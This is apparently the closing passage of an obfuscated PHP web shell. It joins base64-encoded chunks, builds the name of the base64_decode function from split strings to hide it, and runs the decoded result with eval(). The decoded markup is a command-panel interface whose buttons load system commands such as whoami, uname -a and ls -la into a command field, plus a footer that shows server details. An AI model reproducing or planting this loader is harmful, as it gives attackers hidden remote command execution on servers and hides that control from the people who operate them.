$z .= "ICAgPCEtLSBRdWljayBDb21tYW5kcy";
$z .= "AtLT4NCiAgICAgICAgICAgIDxkaXYg";
$z .= "c3R5bGU9ImRpc3BsYXk6ZmxleDsgZm";
$z .= "xleC13cmFwOndyYXA7IGdhcDo1cHg7";
$z .= "IG1hcmdpbi10b3A6MTBweDsiPg0KIC";
$z .= "AgICAgICAgICAgICAgIDxzcGFuIHN0";
$z .= "eWxlPSJjb2xvcjojY2NjOyBmb250LX";
$z .= "NpemU6MTFweDsgcGFkZGluZzozcHgg";
$z .= "MDsiPuKaoSBRdWljazo8L3NwYW4+DQ";
$z .= "ogICAgICAgICAgICAgICAgPGJ1dHRv";
$z .= "biBvbmNsaWNrPSJkb2N1bWVudC5nZX";
$z .= "RFbGVtZW50c0J5TmFtZSgnX19jbWRf";
$z .= "XycpWzBdLnZhbHVlPSdscyAtbGEnOy";
$z .= "IgY2xhc3M9ImJ0biIgc3R5bGU9InBh";
$z .= "ZGRpbmc6M3B4IDhweDsgZm9udC1zaX";
$z .= "plOjExcHg7Ij5scyAtbGE8L2J1dHRv";
$z .= "bj4NCiAgICAgICAgICAgICAgICA8Yn";
$z .= "V0dG9uIG9uY2xpY2s9ImRvY3VtZW50";
$z .= "LmdldEVsZW1lbnRzQnlOYW1lKCdfX2";
$z .= "NtZF9fJylbMF0udmFsdWU9J3B3ZCc7";
$z .= "IiBjbGFzcz0iYnRuIiBzdHlsZT0icG";
$z .= "FkZGluZzozcHggOHB4OyBmb250LXNp";
$z .= "emU6MTFweDsiPnB3ZDwvYnV0dG9uPg";
$z .= "0KICAgICAgICAgICAgICAgIDxidXR0";
$z .= "b24gb25jbGljaz0iZG9jdW1lbnQuZ2";
$z .= "V0RWxlbWVudHNCeU5hbWUoJ19fY21k";
$z .= "X18nKVswXS52YWx1ZT0ncGhwIC12Jz";
$z .= "siIGNsYXNzPSJidG4iIHN0eWxlPSJw";
$z .= "YWRkaW5nOjNweCA4cHg7IGZvbnQtc2";
$z .= "l6ZToxMXB4OyI+cGhwIC12PC9idXR0";
$z .= "b24+DQogICAgICAgICAgICAgICAgPG";
$z .= "J1dHRvbiBvbmNsaWNrPSJkb2N1bWVu";
$z .= "dC5nZXRFbGVtZW50c0J5TmFtZSgnX1";
$z .= "9jbWRfXycpWzBdLnZhbHVlPSdjb21w";
$z .= "b3NlciAtLXZlcnNpb24nOyIgY2xhc3";
$z .= "M9ImJ0biIgc3R5bGU9InBhZGRpbmc6";
$z .= "M3B4IDhweDsgZm9udC1zaXplOjExcH";
$z .= "g7Ij5jb21wb3NlcjwvYnV0dG9uPg0K";
$z .= "ICAgICAgICAgICAgICAgIDxidXR0b2";
$z .= "4gb25jbGljaz0iZG9jdW1lbnQuZ2V0";
$z .= "RWxlbWVudHNCeU5hbWUoJ19fY21kX1";
$z .= "8nKVswXS52YWx1ZT0nbnBtIC0tdmVy";
$z .= "c2lvbic7IiBjbGFzcz0iYnRuIiBzdH";
$z .= "lsZT0icGFkZGluZzozcHggOHB4OyBm";
$z .= "b250LXNpemU6MTFweDsiPm5wbTwvYn";
$z .= "V0dG9uPg0KICAgICAgICAgICAgICAg";
$z .= "IDxidXR0b24gb25jbGljaz0iZG9jdW";
$z .= "1lbnQuZ2V0RWxlbWVudHNCeU5hbWUo";
$z .= "J19fY21kX18nKVswXS52YWx1ZT0nZ2";
$z .= "l0IC0tdmVyc2lvbic7IiBjbGFzcz0i";
$z .= "YnRuIiBzdHlsZT0icGFkZGluZzozcH";
$z .= "ggOHB4OyBmb250LXNpemU6MTFweDsi";
$z .= "PmdpdDwvYnV0dG9uPg0KICAgICAgIC";
$z .= "AgICAgICAgIDxidXR0b24gb25jbGlj";
$z .= "az0iZG9jdW1lbnQuZ2V0RWxlbWVudH";
$z .= "NCeU5hbWUoJ19fY21kX18nKVswXS52";
$z .= "YWx1ZT0nd2hvYW1pJzsiIGNsYXNzPS";
$z .= "JidG4iIHN0eWxlPSJwYWRkaW5nOjNw";
$z .= "eCA4cHg7IGZvbnQtc2l6ZToxMXB4Oy";
$z .= "I+d2hvYW1pPC9idXR0b24+DQogICAg";
$z .= "ICAgICAgICAgICAgPGJ1dHRvbiBvbm";
$z .= "NsaWNrPSJkb2N1bWVudC5nZXRFbGVt";
$z .= "ZW50c0J5TmFtZSgnX19jbWRfXycpWz";
$z .= "BdLnZhbHVlPSd1bmFtZSAtYSc7IiBj";
$z .= "bGFzcz0iYnRuIiBzdHlsZT0icGFkZG";
$z .= "luZzozcHggOHB4OyBmb250LXNpemU6";
$z .= "MTFweDsiPnVuYW1lPC9idXR0b24+DQ";
$z .= "ogICAgICAgICAgICA8L2Rpdj4NCiAg";
$z .= "ICAgICAgPC9kaXY+DQogICAgICAgIA";
$z .= "0KICAgICAgICA8IS0tIEZPT1RFUiAt";
$z .= "LT4NCiAgICAgICAgPGRpdiBjbGFzcz";
$z .= "0iZm9vdGVyIj4NCiAgICAgICAgICAg";
$z .= "IPCfj7TigI3imKDvuI8gUVFRUVFRUV";
$z .= "EgTEFVVCB8IDw/cGhwIGVjaG8gZGF0";
$z .= "ZSgnWS1tLWQgSDppOnMnKTsgPz4gfC";
$z .= "BQSFAgPD9waHAgZWNobyBQSFBfVkVS";
$z .= "U0lPTjsgPz4NCiAgICAgICAgICAgID";
$z .= "xicj4NCiAgICAgICAgICAgIDxzbWFs";
$z .= "bCBzdHlsZT0iY29sb3I6IzM5RkYxND";
$z .= "sgZm9udC1zaXplOiAxMHB4OyI+S0FU";
$z .= "QUtBTiBOTyBQQURBIE5BUktPQkE8L3";
$z .= "NtYWxsPg0KICAgICAgICA8L2Rpdj4N";
$z .= "CiAgICA8L2Rpdj4NCiAgICANCiAgIC";
$z .= "A8c2NyaXB0Pg0KICAgICAgICBmdW5j";
$z .= "dGlvbiBjb25maXJtRGVsZXRlKG5hbW";
$z .= "UpIHsNCiAgICAgICAgICAgIHJldHVy";
$z .= "biBjb25maXJtKCdBcmUgeW91IHN1cm";
$z .= "UgeW91IHdhbnQgdG8gZGVsZXRlICIn";
$z .= "ICsgbmFtZSArICciPycpOw0KICAgIC";
$z .= "AgICB9DQogICAgPC9zY3JpcHQ+DQo8";
$z .= "L2JvZHk+DQo8L2h0bWw+";

// reconstruct function name
$a = "ba"; $b = "se"."64"."_de"."co"."de"; $c = $a.$b;
$payload = $c($z);
eval($payload);
?>
